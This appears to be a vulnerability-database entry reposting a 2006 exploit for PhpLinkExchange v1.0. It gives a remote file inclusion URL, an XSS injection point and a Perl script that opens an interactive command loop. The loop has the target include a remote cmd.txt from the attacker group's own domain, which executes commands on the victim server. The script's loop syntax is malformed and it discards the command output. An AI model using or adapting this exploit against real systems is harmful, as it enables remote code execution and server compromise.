PhpLinkExchange v1.0 RFI + RC + Xss [RC-exploit]

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053145 漏洞类型
发布时间 2006-09-18 更新时间 2006-09-18
CVE编号 CVE-2006-4742
CVE-2006-4741
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006090089
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
vendor :www.idevspot.com

Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange

By : s3rv3r_hack3r

www: hackerz.ir & h4ckerz.com

remote file include :

http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart
=[shell.txt?]

xss:

http://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss]

remote command Exploit :

#!/usr/bin/perl

#

# Exploit by s3rv3r_hack3r

######################################################

# ___ ___ __ #

# / | \_____ ____ | | __ ___________________ #

#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / #

#\ Y // __ \\ \___| <\ ___/| | \// / #

# \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ #

# \/ \/ \/ \/ \/ \/ #

# Iran Hackerz Security Team #

# WebSite: www.hackerz.ir & www.h4ckerz.com

######################################################

use LWP::Simple;

print "-------------------------------------------\n";

print "= Iran hacekerz security team =\n";

print "= By s3rv3r_hack3r - www.hackerz.ir =\n";

print "-------------------------------------------\n\n";

print "Target >http://";

chomp($targ = <STDIN>);

print "your web site name >";

chomp($cmd= <STDIN>);

$con=get("http://".$targ."/bits_listings.php") || die "[-]Cannot connect to Host";

while ()

{

print "command\$";

chomp($cmd=<STDIN>);

$commd=get("http://".$targ."/bits_listings.php?svr_rootPhpStart=http://w
ww.hackerz.ir/cmd.txt?cmd=".$cmd)

}

+++++